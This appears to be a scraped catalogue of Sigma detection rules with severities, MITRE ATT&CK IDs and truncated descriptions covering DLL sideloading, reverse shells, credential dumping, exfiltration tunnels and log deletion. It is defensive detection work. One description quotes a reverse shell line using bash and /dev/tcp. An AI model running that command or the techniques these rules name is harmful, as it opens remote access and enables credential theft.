Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
New Custom Shim Database Created
sigma medium
T1547.009
imFileEvent
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
T1055.009
imProcessCreate
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
Load Of RstrtMgr.DLL By A Suspicious Process
sigma high
T1486T1562.001
DeviceImageLoadEvents
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them
Network Connection Initiated To DevTunnels Domain
sigma medium
T1567.001T1572
imNetworkSession
Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
T1567T1572
imNetworkSession
Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Windows Defender Exclusion List Modified
sigma medium
T1562.001
imRegistry
Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to b
Network Connection Initiated By IMEWDBLD.EXE
sigma high
T1105
imNetworkSession
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
T1190
imWebSession
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
imFileEvent
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
Visual Studio Code Tunnel Remote File Creation
sigma medium
imFileEvent
Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
PowerShell Profile Modification
sigma medium
T1546.013
imFileEvent
Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
T1003.001
imFileEvent
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
ADSI-Cache File Creation By Uncommon Tool
sigma medium
T1001.003
imFileEvent
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Suspicious LNK Double Extension File Created
sigma medium
T1036.007
imFileEvent
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Potential Webshell Creation On Static Website
sigma medium
T1505.003
imFileEvent
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
T1059.003
imFileEvent
Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<usern
T1564.004
imFileEvent
Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powers
imFileEvent
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
DLL Load By System Process From Suspicious Locations
sigma medium
T1070
DeviceImageLoadEvents
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
Network Connection Initiated By Regsvr32.EXE
sigma medium
T1559.001T1218.010
imNetworkSession
Detects a network connection initiated by "Regsvr32.exe"
Remote DLL Load Via Rundll32.EXE
sigma medium
T1204.002
DeviceImageLoadEvents
Detects a remote DLL load event via "rundll32.exe".
Potentially Suspicious DMP/HDMP File Creation
sigma medium
imFileEvent
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can someti
T1059.012T1098
imProcessCreate
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
ESXi Network Configuration Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
ESXi Storage Information Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and Loc
ESXi Syslog Configuration Change Via ESXCLI
sigma medium
T1562.001T1562.003T1059.012
imProcessCreate
Detects changes to the ESXi syslog configuration via "esxcli"
ESXi System Information Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
ESXi VM Kill Via ESXCLI
sigma medium
T1059.012T1529
imProcessCreate
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
ESXi VM List Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
ESXi VSAN Information Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
SQL Injection Strings In URI
sigma high
T1190
imWebSession
Detects potential SQL injection attempts via GET requests in access logs.
T1082
imProcessCreate
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
T1082
imProcessCreate
Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
SCR File Write Event
sigma medium
T1218.011
imFileEvent
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
ESXi Account Creation Via ESXCLI
sigma medium
T1136T1059.012
imProcessCreate
Detects user account creation on ESXi system via esxcli
Assembly DLL Creation Via AspNetCompiler
sigma medium
imFileEvent
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
CSExec Service File Creation
sigma medium
T1569.002
imFileEvent
Detects default CSExec service filename which indicates CSExec service installation and execution
Potential Mpclient.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
RemCom Service File Creation
sigma medium
T1569.002
imFileEvent
Detects default RemCom service filename which indicates RemCom service installation and execution
Potential AVKkid.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "AVKkid.dll"
Potential EACore.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "EACore.dll"
Potential Linux Amazon SSM Agent Hijacking
sigma medium
T1219.002
imProcessCreate
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Potential Mfdetours.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directo
Potential Vivaldi_elf.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "vivaldi_elf.dll"
T1547.015
imFileEvent
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Potential CCleanerDU.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "CCleanerReactivator.dll"
T1059
DeviceImageLoadEvents
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
Legitimate Application Dropped Executable
sigma high
T1218
imFileEvent
Detects programs on a Windows system that should not write executables to disk
Legitimate Application Dropped Script
sigma high
T1218
imFileEvent
Detects programs on a Windows system that should not write scripts to disk
T1137
imFileEvent
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Potential appverifUI.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "appverifUI.dll"
Potential ShellDispatch.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "ShellDispatch.dll"
Linux Base64 Encoded Pipe to Shell
sigma medium
T1140
imProcessCreate
Detects suspicious process command line that uses base64 encoded input for execution with a shell
Named Pipe Created Via Mkfifo
sigma low
imProcessCreate
Detects the creation of a new named pipe using the "mkfifo" utility
Potentially Suspicious Named Pipe Created Via Mkfifo
sigma medium
imProcessCreate
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
Potential Waveedit.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Potential 7za.DLL Sideloading
sigma low
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "7za.dll"
Potential Edputil.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "edputil.dll"
T1574.001
DeviceImageLoadEvents
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Crontab Enumeration
sigma low
T1007
imProcessCreate
Detects usage of crontab to list the tasks of the user
T1105
imProcessCreate
Detects the use of wget to download content to a suspicious directory
imProcessCreate
Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
OS Architecture Discovery Via Grep
sigma low
T1082
imProcessCreate
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
Potential GobRAT File Discovery Via Grep
sigma high
T1082
imProcessCreate
Detects the use of grep to discover specific files created by the GobRAT malware
imFileEvent
Detects the creation of shell scripts under the "profile.d" path.
imProcessCreate
Detects execution of shells from a parent process located in a temporary (/tmp) directory
Suspicious Nohup Execution
sigma high
imProcessCreate
Detects execution of binaries located in potentially suspicious locations via "nohup"
Wget Creating Files in Tmp Directory
sigma medium
T1105
imFileEvent
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
Potential SmadHook.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
PowerShell Core DLL Loaded Via Office Application
sigma medium
DeviceImageLoadEvents
Detects PowerShell core DLL being loaded by an Office Product
T1565.001
imProcessCreate
Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
T1102T1567T1105
imNetworkSession
Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
Potential WWlib.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "wwlib.dll"
Telegram API Access
sigma medium
T1071.001T1102.002
imWebSession
Detects suspicious requests to Telegram API without the usual Telegram User-Agent
Bitsadmin to Uncommon TLD
sigma high
T1071.001T1197
imWebSession
Detects Bitsadmin connections to domains with uncommon TLDs
LiveKD Driver Creation By Uncommon Process
sigma high
imFileEvent
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
LiveKD Driver Creation
sigma medium
imFileEvent
Detects the creation of the LiveKD driver, which is used for live kernel debugging
LiveKD Kernel Memory Dump File Created
sigma high
imFileEvent
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
Potential Chrome Frame Helper DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "chrome_frame_helper.dll"
Potential RoboForm.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Microsoft Excel Add-In Loaded From Uncommon Location
sigma medium
T1204.002
DeviceImageLoadEvents
Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
Potential Wazuh Security Platform DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
imFileEvent
Detects the creation of binaries in the WinSxS folder by non-system processes
HackTool - Dumpert Process Dumper Default File
sigma critical
T1003.001
imFileEvent
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
Potential Suspicious PowerShell Module File Created
sigma medium
imFileEvent
Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legiti
PowerShell Module File Created
sigma low
imFileEvent
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
imFileEvent
Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
Rclone Config File Creation
sigma medium
T1567.002
imFileEvent
Detects Rclone config files being created
T1036T1036.003
imFileEvent
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homo
Potential SolidPDFCreator.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "SolidPDFCreator.dll"
NTDS.DIT Created
sigma low
T1003.003
imFileEvent
Detects creation of a file named "ntds.dit" (Active Directory Database)
NTDS Exfiltration Filename Patterns
sigma high
T1003.003
imFileEvent
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
T1068
imFileEvent
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to
T1068
imFileEvent
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
Suspicious File Created In PerfLogs
sigma medium
T1059
imFileEvent
Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
VHD Image Download Via Browser
sigma medium
T1587.001
imFileEvent
Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
Potential Base64 Encoded User-Agent
sigma medium
T1071.001
imWebSession
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
Suspicious Base64 Encoded User-Agent
sigma medium
T1071.001
imWebSession
Detects suspicious encoded User-Agent strings, as seen used by some malware.
T1102
imNetworkSession
Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
Suspicious Curl File Upload - Linux
sigma medium
T1567T1105
imProcessCreate
Detects a suspicious curl process start the adds a file to a web request
Potential Xterm Reverse Shell
sigma medium
T1059
imProcessCreate
Detects usage of "xterm" as a potential reverse shell tunnel
Potential Azure Browser SSO Abuse
sigma low
T1574.001
DeviceImageLoadEvents
Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD accou
Potential Libvlc.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Bash Interactive Shell
sigma low
imProcessCreate
Detects execution of the bash shell with the interactive flag "-i".
Potential Netcat Reverse Shell Execution
sigma high
T1059
imProcessCreate
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Potential Perl Reverse Shell Execution
sigma high
imProcessCreate
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Potential PHP Reverse Shell
sigma high
imProcessCreate
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often lever
Potential Ruby Reverse Shell
sigma medium
imProcessCreate
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
CLR DLL Loaded Via Office Applications
sigma medium
T1204.002
DeviceImageLoadEvents
Detects CLR DLL being loaded by an Office Product
DotNET Assembly DLL Loaded Via Office Application
sigma medium
T1204.002
DeviceImageLoadEvents
Detects any assembly DLL being loaded by an Office Product
T1059
imFileEvent
Detects Windows shells and scripting applications that write files to suspicious folders
Potential Iviewers.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Microsoft Office DLL Sideload
sigma high
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Potential Rcdll.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of rcdll.dll
Linux Package Uninstall
sigma low
T1070
imProcessCreate
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Wmiexec Default Output File
sigma critical
T1047
imFileEvent
Detects the creation of the default output filename used by the wmiexec tool
imFileEvent
Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
T1055
DeviceImageLoadEvents
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
T1547.001
imFileEvent
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
T1547.001
imFileEvent
Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files i
PSEXEC Remote Execution File Artefact
sigma high
T1136.002T1543.003T1570
imFileEvent
Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Suspicious DotNET CLR Usage Log Artifact
sigma high
T1218
imFileEvent
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context
imFileEvent
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used
T1566.001
imFileEvent
Detects the creation of a office macro file from a a suspicious process
Potential Persistence Via Outlook Form
sigma high
T1137.003
imFileEvent
Detects the creation of a new Outlook form which can contain malicious code
T1546.003
DeviceImageLoadEvents
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
T1202
DeviceImageLoadEvents
Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
T1218.003
DeviceImageLoadEvents
Detects cmstp loading "dll" or "ocx" files from suspicious locations
Dynamic CSharp Compile Artefact
sigma low
T1027.004
imFileEvent
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can
HackTool - SILENTTRINITY Stager DLL Load
sigma high
T1071
DeviceImageLoadEvents
Detects SILENTTRINITY stager dll loading activity
Potential DLL Sideloading Via VMware Xfer
sigma high
T1574.001
DeviceImageLoadEvents
Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
Tomcat WebServer Logs Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
Backup Files Deleted
sigma medium
T1490
imFileEvent
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrup
EventLog EVTX File Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
File Deleted Via Sysinternals SDelete
sigma medium
T1070.004
imFileEvent
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
IIS WebServer Access Logs Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
PowerShell Console History Logs Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
TeamViewer Log File Deleted
sigma low
T1070.004
imFileEvent
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
Unusual File Deletion by Dns.exe
sigma high
T1133
imFileEvent
Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
GAC DLL Loaded Via Office Applications
sigma high
T1204.002
DeviceImageLoadEvents
Detects any GAC DLL being loaded by an Office Product
VBA DLL Loaded Via Office Application
sigma high
T1204.002
DeviceImageLoadEvents
Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
GatherNetworkInfo.VBS Reconnaissance Script Output
sigma medium
imFileEvent
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
New Outlook Macro Created
sigma medium
T1137T1008T1546
imFileEvent
Detects the creation of a macro file for Outlook.
T1137.006
imFileEvent
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
imFileEvent
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
Suspicious Outlook Macro Created
sigma high
T1137T1008T1546
imFileEvent
Detects the creation of a macro file for Outlook.
Copy Passwd Or Shadow From TMP Path
sigma high
T1552.001
imProcessCreate
Detects when the file "passwd" or "shadow" is copied from tmp path
Enable BPF Kprobes Tracing
sigma medium
imProcessCreate
Detects common command used to enable bpf kprobes tracing
Java Payload Strings
sigma high
T1190
imWebSession
Detects possible Java payloads in web access logs
Raw Paste Service Access
sigma high
T1071.001T1102.001T1102.003
imWebSession
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Flush Iptables Ufw Chain
sigma medium
T1562.004
imProcessCreate
Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
Ufw Force Stop Using Ufw-Init
sigma medium
T1562.004
imProcessCreate
Detects attempts to force stop the ufw using ufw-init
T1049
imProcessCreate
Detects usage of system utilities to discover system network connections
Mount Execution With Hidepid Parameter
sigma medium
T1564
imProcessCreate
Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
Touch Suspicious Service File
sigma medium
T1070.006
imProcessCreate
Detects usage of the "touch" process in service file.
VsCode Powershell Profile Modification
sigma medium
T1546.013
imFileEvent
Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
NTDS.DIT Creation By Uncommon Parent Process
sigma high
T1003.003
imFileEvent
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
Potential RipZip Attack on Startup Folder
sigma high
T1547
imFileEvent
Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP fil
Potential SAM Database Dump
sigma high
T1003.002
imFileEvent
Detects the creation of files that look like exports of the local SAM (Security Account Manager)
Potential Winnti Dropper Activity
sigma high
T1027
imFileEvent
Detects files dropped by Winnti as described in RedMimicry Winnti playbook
Suspicious Creation with Colorcpl
sigma high
T1564
imFileEvent
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Suspicious Git Clone - Linux
sigma medium
T1593.003
imProcessCreate
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
Linux Doas Conf File Creation
sigma medium
T1548
imFileEvent
Detects the creation of doas.conf file in linux host platform.
Persistence Via Cron Files
sigma medium
T1053.003
imFileEvent
Detects creation of cron file or files in Cron directories which could indicates potential persistence.
Persistence Via Sudoers Files
sigma medium
T1053.003
imFileEvent
Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
Potential DLL Sideloading Using Coregen.exe
sigma medium
T1218T1055
DeviceImageLoadEvents
Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Triple Cross eBPF Rootkit Default LockFile
sigma high
imFileEvent
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
T1053.003
imFileEvent
Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Exchange PowerShell Cmdlet History Deleted
sigma high
T1070
imFileEvent
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
Linux Webshell Indicators
sigma high
T1505.003
imProcessCreate
Detects suspicious sub processes of web server processes
Potential Discovery Activity Using Find - Linux
sigma medium
T1083
imProcessCreate
Detects usage of "find" binary in a suspicious manner to perform discovery
Group Has Been Deleted Via Groupdel
sigma medium
T1531
imProcessCreate
Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
User Has Been Deleted Via Userdel
sigma medium
T1531
imProcessCreate
Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
JNDIExploit Pattern
sigma high
T1190
imWebSession
Detects exploitation attempt using the JNDI-Exploit-Kit
Linux Crypto Mining Indicators
sigma high
T1496
imProcessCreate
Detects command line parameters or strings often used by crypto miners
Linux Reverse Shell Indicator
sigma critical
T1059.004
imNetworkSession
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
UAC Bypass With Fake DLL
sigma high
T1548.002T1574.001
DeviceImageLoadEvents
Attempts to load dismcore.dll after dropping it
User Added To Root/Sudoers Group Using Usermod
sigma medium
imProcessCreate
Detects usage of the "usermod" binary to add users add users to the root or suoders groups
T1112T1562
imRegistry
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential DLL Sideloading Via comctl32.dll
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential Persistence Attempt Via ErrorHandler.Cmd
sigma medium
imFileEvent
Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
imFileEvent
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Potential DCOM InternetExplorer.Application DLL Hijack
sigma critical
T1021.002T1021.003
imFileEvent
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
T1021.002T1021.003
DeviceImageLoadEvents
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
Potential DLL Sideloading Via JsSchHlp
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential DLL Sideloading Via ClassicExplorer32.dll
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
T1003.001
imFileEvent
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Err
Adwind RAT / JRAT File Artifact
sigma high
T1059.005T1059.007
imFileEvent
Detects javaw.exe in AppData folder as used by Adwind / JRAT
Time Travel Debugging Utility Usage - Image
sigma high
T1218T1003.001
DeviceImageLoadEvents
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Wmiprvse Wbemcomn DLL Hijack - File
sigma critical
T1047T1021.002
imFileEvent
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
WScript or CScript Dropper - File
sigma high
T1059.005T1059.007
imFileEvent
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
DLL Sideloading Of ShellChromeAPI.DLL
sigma high
T1574.001
DeviceImageLoadEvents
Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can d
Advanced IP Scanner - File Event
sigma medium
T1046
imFileEvent
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
WMI Persistence - Security
sigma medium
T1546.003
imRegistry
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
T1216
imFileEvent
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Scheduled Cron Task/Job - Linux
sigma medium
T1053.003
imProcessCreate
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Security Software Discovery - Linux
sigma low
T1518.001
imProcessCreate
Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
Suspicious PROCEXP152.sys File Created In TMP
sigma medium
T1562.001
imFileEvent
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) o
UAC Bypass Using EventVwr
sigma high
imFileEvent
Detects the pattern of a UAC bypass using Windows Event Viewer
Windows Webshell Strings
sigma high
T1505.003
imWebSession
Detects common commands used in Windows webshells
Suspicious Screensaver Binary File Creation
sigma medium
T1546.002
imFileEvent
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po
T1567T1568.002T1572T1090T1102
imNetworkSession
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Suspicious User Agent
sigma high
T1071.001
imWebSession
Detects suspicious malformed user agent strings in proxy logs
PsExec Service File Creation
sigma low
T1569.002
imFileEvent
